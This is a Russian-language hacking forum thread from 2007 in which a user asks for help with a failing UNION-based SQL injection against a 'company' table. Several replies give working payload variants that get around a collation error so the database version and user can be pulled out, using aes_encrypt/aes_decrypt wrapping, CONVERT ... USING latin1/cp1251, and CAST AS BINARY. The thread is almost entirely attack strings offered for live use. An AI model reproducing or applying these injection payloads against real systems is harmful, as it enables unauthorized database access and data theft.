ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу code to sql injection, help
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

code to sql injection, help
  #1  
Старый 28.09.2007, 20:05
rubik-nerubik
Участник форума
Регистрация: 04.05.2007
Сообщений: 267
Провел на форуме:
409147

Репутация: 33
По умолчанию code to sql injection, help
выручайте, нужно прально зафигачить допустим version() в этой коде:


Код:
Error: SELECT * from company WHERE company_id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24 from company/*
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
 
Ответить с цитированием

  #2  
Старый 28.09.2007, 20:08
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию
Пробуем
Код:
-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,aes_decrypt(aes_encrypt(version(),1),1),22,23,24 from company/*
 
Ответить с цитированием

  #3  
Старый 28.09.2007, 20:10
rubik-nerubik
Участник форума
Регистрация: 04.05.2007
Сообщений: 267
Провел на форуме:
409147

Репутация: 33
По умолчанию
ok плюс кинул
 
Ответить с цитированием

  #4  
Старый 28.09.2007, 20:12
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию
Цитата:
Сообщение от rubik-nerubik  
выручайте, нужно прально зафигачить допустим version() в этой коде:


Код:
Error: SELECT * from company WHERE company_id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24 from company/*
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
aes_decrypt(aes_encrypt(version(),0x71),0x71) поздно =\
 
Ответить с цитированием

  #5  
Старый 28.09.2007, 20:14
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию
либо convert(version() using latin1)
 
Ответить с цитированием

  #6  
Старый 28.09.2007, 20:19
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
http://www.sysman.ru/index.php?showtopic=13530
+union+select+convert(user() using cp1251)
CAST(user AS BINARY).
__________________
Full DNS report
Последний раз редактировалось Azazel; 28.09.2007 в 20:28..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ